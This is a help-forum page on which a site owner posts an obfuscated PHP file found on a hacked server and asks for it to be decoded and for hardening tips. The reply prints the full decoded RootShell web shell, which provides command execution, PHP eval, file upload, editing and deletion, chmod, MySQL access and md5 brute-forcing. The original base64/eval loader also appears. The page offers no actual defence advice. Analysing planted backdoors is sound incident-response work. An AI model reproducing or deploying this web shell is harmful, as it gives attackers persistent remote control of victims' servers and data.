GJyPiI7DQogfQ0KIA0KIHByNG50ICI8L3QxYmw1Pjxocj48dDFibDUgYjJyZDVyPTAgdzRkdGg9NjAwJT48dGQ+PGI+VXBsMjFkIGY0bDU8L2I+PGJyPjxmMnJtIDVuY3R5cDU9XCJtM2x0NHAxcnQvZjJybS1kMXQxXCIgMWN0NDJuPVwiIi4kbTUuIj9kNHI9Ii5yNTFscDF0aCgnLicpLiJcIiBtNXRoMmQ9XCJQT1NUXCI+DQo8NG5wM3QgdHlwNT1cImg0ZGQ1blwiIG4xbTU9XCJNQVhfRklMRV9TSVpFXCIgdjFsMzU9XCI2MDAwMDAwMDBcIiAvPjw0bnAzdCBzNHo1PW8wIG4xbTU9XCIzcGwyMWQ1ZGY0bDVcIiB0eXA1PVwiZjRsNVwiIC8+DQo8NG5wM3QgdHlwNT1cInMzYm00dFwiIHYxbDM1PVwiVXBsMjFkIEY0bDVcIiAvPg0KPC9mMnJtPjwvdGQ+PHRkPjxmMnJtIDFjdDQybj1cIiIuJG01LiJcIiBtNXRoMmQ9R0VUPjxiPkNoMW5nNSBENHI1Y3Qycnk8YnI+PC9iPjw0bnAzdCB0eXA1PXQ1eHQgczR6NT11MCBuMW01PWQ0ciB2MWwzNT1cIiIucjUxbHAxdGgoJy4nKS4iXCI+PDRucDN0IHR5cDU9czNibTR0IHYxbDM1PVwiQ2gxbmc1IEQ0cjVjdDJyeVwiPjwvZjJybT48L3RkPg0KPHRyPjx0ZD48ZjJybSAxY3Q0Mm49XCIiLiRtNS4iXCIgbTV0aDJkPUdFVD48Yj5DcjUxdDUgZjRsNTxicj48L2I+PDRucDN0IHR5cDU9aDRkZDVuIG4xbTU9ZDRyIHYxbDM1PVwiIi5yNTFscDF0aCgnLicpLiJcIj48NG5wM3QgdHlwNT10NXh0IHM0ejU9dTAgbjFtNT1mNGw1IHYxbDM1PVwiIi5yNTFscDF0aCgnLicpLiJcIj48NG5wM3QgdHlwNT1oNGRkNW4gbjFtNT1wIHYxbDM1PTVkNHQ+PDRucDN0IHR5cDU9czNibTR0IHYxbDM1PVwiQ3I1MXQ1IGY0bDVcIj48L2Yycm0+DQo8L3RkPjx0ZD48ZjJybSAxY3Q0Mm49XCIiLiRtNS4iXCIgbTV0aDJkPUdFVD48Yj5DcjUxdDUgZDRyNWN0MnJ5PGJyPjwvYj48NG5wM3QgdHlwNT10NXh0IHM0ejU9dTAgbjFtNT1jcmQ0ciB2MWwzNT1cIiIucjUxbHAxdGgoJy4nKS4iXCI+PDRucDN0IHR5cDU9aDRkZDVuIG4xbTU9ZDRyIHYxbDM1PVwiIi5yNTFscDF0aCgnLicpLiJcIj48NG5wM3QgdHlwNT1oNGRkNW4gbjFtNT1wIHYxbDM1PWNyNTF0NWQ0cj48NG5wM3QgdHlwNT1zM2JtNHQgdjFsMzU9XCJDcjUxdDUgZDRyNWN0MnJ5XCI+PC9mMnJtPjwvdGQ+DQo8L3QxYmw1PiI7DQoNCn0NCg0KZjNuY3Q0Mm4gbDJnNG4oKQ0Kew0KIHByNG50ICI8dDFibDUgYjJyZDVyPTAgdzRkdGg9NjAwJSBoNTRnaHQ9NjAwJT48dGQgdjFsNGduPVwibTRkZGw1XCI+PGM1bnQ1cj4NCiA8ZjJybSAxY3Q0Mm49Ii5iMXM1bjFtNShfX0ZJTEVfXykuIiBtNXRoMmQ9XCJQT1NUXCI+PGI+UDFzc3cycmQ/PC9iPg0KIDw0bnAzdCB0eXA1PVwicDFzc3cycmRcIiBtMXhsNW5ndGg9XCJvYVwiIG4xbTU9XCJwMXNzXCI+PDRucDN0IHR5cDU9XCJzM2JtNHRcIiB2MWwzNT1cIkwyZzRuXCI+DQogPC9mMnJtPiI7DQp9DQpmM25jdDQybiByNWwyMWQoKQ0Kew0KIGg1MWQ1cigiTDJjMXQ0Mm46ICIuYjFzNW4xbTUoX19GSUxFX18pKTsNCn0NCmYzbmN0NDJuIGc1dF81eDVjM3Q0Mm5fbTV0aDJkKCkNCnsNCiA0ZihmM25jdDQybl81eDRzdHMoJ3Axc3N0aHIzJykpeyAkbSA9ICJwMXNzdGhyMyI7IH0NCiA0ZihmM25jdDQybl81eDRzdHMoJzV4NWMnKSl7ICRtID0gIjV4NWMiOyB9DQogNGYoZjNuY3Q0Mm5fNXg0c3RzKCdzaDVsbF81eDVjJykpeyAkbSA9ICJzaDVsbF8gNXg1YyI7IH0NCiA0ZihmM25jdDQybl81eDRzdHMoJ3N5c3Q1bScpKXsgJG0gPSAic3lzdDVtIjsgfQ0KIDRmKCE0c3M1dCgkbSkpIC8vTjIgbTV0aDJkIGYyM25kIDotfA0KIHsNCiAgJG0gPSAiRDRzMWJsNWQiOw0KIH0NCiByNXQzcm4oJG0pOw0KfQ0KZjNuY3Q0Mm4gNXg1YzN0NV9jMm1tMW5kKCRtNXRoMmQsJGMybW0xbmQpDQp7DQogNGYoJG01dGgyZCA9PSAicDFzc3RocjMiKQ0KIHsNCiAgcDFzc3RocjMoJGMybW0xbmQpOw0KIH0NCiANCiA1bHM1NGYoJG01dGgyZCA9PSAiNXg1YyIpDQogew0KICA1eDVjKCRjMm1tMW5kLCRyNXMzbHQpOw0KICBmMnI1MWNoKCRyNXMzbHQgMXMgJDIzdHAzdCkNCiAgew0KICAgcHI0bnQgJDIzdHAzdC4iPGJyPiI7DQogIH0NCiB9DQogDQogNWxzNTRmKCRtNXRoMmQgPT0gInNoNWxsXzV4NWMiKQ0KIHsNCiAgcHI0bnQgc2g1bGxfNXg1YygkYzJtbTFuZCk7DQogfQ0KIA0KIDVsczU0ZigkbTV0aDJkID09ICJzeXN0NW0iKQ0KIHsNCiAgc3lzdDVtKCRjMm1tMW5kKTsNCiB9DQp9DQpmM25jdDQybiBwNXJtKCRmNGw1KQ0Kew0KIDRmKGY0bDVfNXg0c3RzKCRmNGw1KSkNCiB7DQogIHI1dDNybiBzM2JzdHIoc3ByNG50ZignJTInLCBmNGw1cDVybXMoJGY0bDUpKSwgLXUpOw0KIH0NCiA1bHM1DQogew0KICByNXQzcm4gIj8/Pz8iOw0KIH0NCn0NCmYzbmN0NDJuIGc1dF9jMmwycigkZjRsNSkNCnsNCjRmKDRzX3dyNHQxYmw1KCRmNGw1KSkgeyByNXQzcm4gImdyNTVuIjt9DQo0ZighNHNfd3I0dDFibDUoJGY0bDUpICYmIDRzX3I1MWQxYmw1KCRmNGw1KSkgeyByNXQzcm4gIndoNHQ1Ijt9DQo0ZighNHNfd3I0dDFibDUoJGY0bDUpICYmICE0c19yNTFkMWJsNSgkZjRsNSkpIHsgcjV0M3JuICJyNWQiO30NCiANCn0NCmYzbmN0NDJuIHNoMndfZDRycygkd2g1cjUpDQp7DQogNGYoNXI1ZygiXmM6IixyNTFscDF0aCgkd2g1cjUpKSkNCiB7DQogJGQ0cnAxcnRzID0gNXhwbDJkNSgnXFwnLHI1MWxwMXRoKCR3aDVyNSkpOw0KIH0NCiA1bHM1DQogew0KICRkNHJwMXJ0cyA9IDV4cGwyZDUoJy8nLHI1MWxwMXRoKCR3aDVyNSkpOw0KIH0NCiANCiANCiANCiAkNCA9IDA7DQogJHQydDFsID0gIiI7DQogDQogZjJyNTFjaCgkZDRycDFydHMgMXMgJHAxcnQpDQogew0KICAkcCA9IDA7DQogICRwcjUgPSAiIjsNCiAgd2g0bDUoJHAgIT0gJDQpDQogIHsNCiAgICRwcjUgLj0gJGQ0cnAxcnRzWyRwXS4iLyI7DQogICAkcCsrOw0KICAgDQogIH0NCiAgJHQydDFsIC49ICI8MSBocjVmPVwiIi5iMXM1bjFtNShfX0ZJTEVfXykuIj9kNHI9Ii4kcHI1LiRwMXJ0LiJcIj4iLiRwMXJ0LiI8LzE+LyI7DQogICQ0Kys7DQogfQ0KIA0KIHI1dDNybiAiPGhhPiIuJHQydDFsLiI8L2hhPjxicj4iOw0KfQ0KcHI0bnQgJGYyMnQ1cjsNCi8vIEV4NHQ6IG0xeWI1IHc1J3I1IDRuY2wzZDVkIHMybTV3aDVyNSAxbmQgdzUgZDJuJ3QgdzFudCB0aDUgMnRoNXIgYzJkNSB0MiBtNXNzIHc0dGggMjNycyA6LSkNCjV4NHQoKTsNCj8+DQog';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

can help me to decode file
and tell me how protect server linux from encode shell

Report

Leave an answer
Cancel reply

You must login to add an answer.

Need An Account,

1 Answer

Editorial Team · Answer 1 · 2026-06-08T18:20:43+00:00

This is the decoded script

?><?php
error_reporting(0); //If there is an error, we'll show it, k?
$password = ""; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
$me = basename('the actual path of this script');
$cookiename = "wieeeee";

if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
{
 if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
 {
  $_POST['pass'] = md5($_POST['pass']);
 }
 if($_POST['pass'] == $password)
 {
   setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
 }
 reload();
}

if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
{
 login();
 die();
}
//
//Do not cross this line! All code placed after this block can't be executed without being logged in!
//
if(isset($_GET['p']) && $_GET['p'] == "logout")
{
setcookie ($cookiename, "", time() - 3600);
reload();
}
if(isset($_GET['dir']))
{
 chdir($_GET['dir']);
}

$pages = array(
 'cmd' => 'Execute Command',
 'eval' => 'Evaluate PHP',
 'mysql' => 'MySQL Query',
 'chmod' => 'Chmod File',
 'phpinfo' => 'PHPinfo',
 'md5' => 'md5 cracker',
 'headers' => 'Show headers',
 'logout' => 'Log out'
);
//The header, like it?
$header = '<html>
<title>'.getenv("HTTP_HOST").' ~ Shell I</title>
<head>
<style>
td {
 font-size: 12px; 
 font-family: verdana;
 color: #33FF00;
 background: #000000;
}
#d {
 background: #003000;
}
#f {
 background: #003300;
}
#s {
 background: #006300;
}
#d:hover
{
 background: #003300;
}
#f:hover
{
 background: #003000;
}
pre {
 font-size: 10px; 
 font-family: verdana;
 color: #33FF00;
}
a:hover {
text-decoration: none;
}

input,textarea,select {
 border-top-width: 1px; 
 font-weight: bold; 
 border-left-width: 1px; 
 font-size: 10px; 
 border-left-color: #33FF00; 
 background: #000000; 
 border-bottom-width: 1px; 
 border-bottom-color: #33FF00; 
 color: #33FF00; 
 border-top-color: #33FF00; 
 font-family: verdana; 
 border-right-width: 1px; 
 border-right-color: #33FF00;
}
hr {
color: #33FF00;
background-color: #33FF00;
height: 5px;
}
</style>
</head>
<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
<table width=100%><td id="header" width=100%>
<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>]  [<a href="'.$me.'">Home</a>] ';
foreach($pages as $page => $page_name)
{
 $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
}
$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
print $header;
$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>';

//
//Page handling
//
if(isset($_REQUEST['p']))
{
  switch ($_REQUEST['p']) {

   case 'cmd': //Run command

    print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
     if(isset($_REQUEST['command']))
     {
      print "<pre>";
      execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
     }
   break;


   case 'edit': //Edit a fie
    if(isset($_POST['editform']))
    {
     $f = $_GET['file'];
     $fh = fopen($f, 'w') or print "Error while opening file!";
     fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
     fclose($fh);
    }
    print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";

    if(file_exists($_GET['file']))
    {
     $rd = file($_GET['file']);
     foreach($rd as $l)
     {
      print htmlspecialchars($l);
     }
    }

    print "</textarea><input type=submit value=\"Save\"></form>";

   break;

   case 'delete': //Delete a file

    if(isset($_POST['yes']))
    {
     if(unlink($_GET['file']))
     {
      print "File deleted successfully.";
     }
     else
     {
      print "Couldn't delete file.";
     }
    }


    if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
    {
     print "Are you sure you want to delete ".$_GET['file']."?<br>
     <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
     <input type=hidden name=yes value=yes>
     <input type=submit value=\"Delete\">
     ";
    }


   break;


   case 'eval': //Evaluate PHP code

    print "<form action=\"".$me."?p=eval\" method=POST>
    <textarea cols=60 rows=10 name=\"eval\">";
    if(isset($_POST['eval']))
    {
     print htmlspecialchars($_POST['eval']);
    }
    else
    {
     print "print \"Yo Momma\";";
    }
    print "</textarea><br>
    <input type=submit value=\"Eval\">
    </form>";

    if(isset($_POST['eval']))
    {
     print "<h1>Output:</h1>";
     print "<br>";
     eval($_POST['eval']);
    }

   break;

   case 'chmod': //Chmod file


    print "<h1>Under construction!</h1>";
    if(isset($_POST['chmod']))
    {
    switch ($_POST['chvalue']){
     case 777:
     chmod($_POST['chmod'],0777);
     break;
     case 644:
     chmod($_POST['chmod'],0644);
     break;
     case 755:
     chmod($_POST['chmod'],0755);
     break;
    }
    print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
    }
    if(isset($_GET['file']))
    {
     $content = urldecode($_GET['file']);
    }
    else
    {
     $content = "file/path/please";
    }

    print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
    <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
    <select name=\"chvalue\">
<option value=\"777\">777</option>
<option value=\"644\">644</option>
<option value=\"755\">755</option>
</select><input type=submit value=\"Change\">";

   break;

   case 'mysql': //MySQL Query

   if(isset($_POST['host']))
   {
    $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
    mysql_select_db($_POST['dbase']);
    $sql = $_POST['query'];


    $result = mysql_query($sql);

   }
   else
   {
    print "
    This only queries the database, doesn't return data!<br>
    <form action=\"".$me."?p=mysql\" method=POST>
    <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
    <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
    <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
    <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>

    <b>Query:<br></b<textarea name=query></textarea>
    <input type=submit value=\"Query database\">
    </form>
    ";

   }

   break;

   case 'createdir':
   if(mkdir($_GET['crdir']))
   {
   print 'Directory created successfully.';
   }
   else
   {
   print 'Couldn\'t create directory';
   }
   break;


   case 'phpinfo': //PHP Info
    phpinfo();
   break;


   case 'rename':

    if(isset($_POST['fileold']))
    {
     if(rename($_POST['fileold'],$_POST['filenew']))
     {
      print "File renamed.";
     }
     else
     {
      print "Couldn't rename file.";
     }

    }
    if(isset($_GET['file']))
    {
     $file = basename(htmlspecialchars($_GET['file']));
    }
    else
    {
     $file = "";
    }

    print "Renaming ".$file." in folder ".realpath('.').".<br>
        <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
     <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
     <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
     <input type=submit value=\"Rename file\">
     </form>";
   break;

   case 'md5':
   if(isset($_POST['md5']))
   {
   if(!is_numeric($_POST['timelimit']))
   {
   $_POST['timelimit'] = 30;
   }
   set_time_limit($_POST['timelimit']);
    if(strlen($_POST['md5']) == 32)
    {

      if($_POST['chars'] == "9999")
      {
      $i = 0;
      while($_POST['md5'] != md5($i) && $i != 100000)
       {
        $i++;
       }
      }
      else
      {
       for($i = "a"; $i != "zzzzz"; $i++)
       {
        if(md5($i == $_POST['md5']))
        {
         break;
        }
       }
      }

     if(md5($i) == $_POST['md5'])
     {
       print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
     }

    }

   }

   print "Will bruteforce the md5
    <form action=\"".$me."?p=md5\" method=POST>
    <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
    <b>Characters:</b><br><select name=\"chars\">
    <option value=\"az\">a - zzzzz</option>
    <option value=\"9999\">1 - 9999999</option>
    </select>
    <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
    <input type=submit value=\"Bruteforce md5\">
    </form><br>*: if set_time_limit is allowed by php.ini";
   break;

   case 'headers':
   foreach(getallheaders() as $header => $value)
   {
   print htmlspecialchars($header . ":" . $value)."<br>";

   }
   break;
  }
}
else //Default page that will be shown when the page isn't found or no page is selected.
{

 $files = array();
 $directories = array();

 if(isset($_FILES['uploadedfile']['name']))
{
 $target_path = realpath('.').'/';
 $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 
 if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
     print "File:".  basename( $_FILES['uploadedfile']['name']). 
     " has been uploaded";
 } else{
     echo "File upload failed!";
 }
}




 print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
 if ($handle = opendir('.'))
 {
  while (false !== ($file = readdir($handle))) 
  {
        if(is_dir($file))
     {
    $directories[] = $file;
     }
     else
     {
    $files[] = $file;
     }
  }
 asort($directories);
 asort($files);
  foreach($directories as $file)
  {
   print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  }

  foreach($files as $file)
  {
   print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  }
 }
 else
 {
  print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
 }

 print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
<input type=\"submit\" value=\"Upload File\" />
</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
</table>";

}

function login()
{
 print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
 <form action=".basename('the actual path of this script')." method=\"POST\"><b>Password?</b>
 <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
 </form>";
}
function reload()
{
 header("Location: ".basename('the actual path of this script'));
}
function get_execution_method()
{
 if(function_exists('passthru')){ $m = "passthru"; }
 if(function_exists('exec')){ $m = "exec"; }
 if(function_exists('shell_exec')){ $m = "shell_ exec"; }
 if(function_exists('system')){ $m = "system"; }
 if(!isset($m)) //No method found :-|
 {
  $m = "Disabled";
 }
 return($m);
}
function execute_command($method,$command)
{
 if($method == "passthru")
 {
  passthru($command);
 }

 elseif($method == "exec")
 {
  exec($command,$result);
  foreach($result as $output)
  {
   print $output."<br>";
  }
 }

 elseif($method == "shell_exec")
 {
  print shell_exec($command);
 }

 elseif($method == "system")
 {
  system($command);
 }
}
function perm($file)
{
 if(file_exists($file))
 {
  return substr(sprintf('%o', fileperms($file)), -4);
 }
 else
 {
  return "????";
 }
}
function get_color($file)
{
if(is_writable($file)) { return "green";}
if(!is_writable($file) && is_readable($file)) { return "white";}
if(!is_writable($file) && !is_readable($file)) { return "red";}

}
function show_dirs($where)
{
 if(ereg("^c:",realpath($where)))
 {
 $dirparts = explode('\\',realpath($where));
 }
 else
 {
 $dirparts = explode('/',realpath($where));
 }



 $i = 0;
 $total = "";

 foreach($dirparts as $part)
 {
  $p = 0;
  $pre = "";
  while($p != $i)
  {
   $pre .= $dirparts[$p]."/";
   $p++;

  }
  $total .= "<a href=\"".basename('the actual path of this script')."?dir=".$pre.$part."\">".$part."</a>/";
  $i++;
 }

 return "<h2>".$total."</h2><br>";
}
print $footer;
// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
exit();
?>

Sign Up

Sign In

Forgot Password

The Archive Base Latest Questions

my site is hacked with this file ( i will put sours code for

Leave an answerCancel reply

1 Answer

Leave an answer
Cancel reply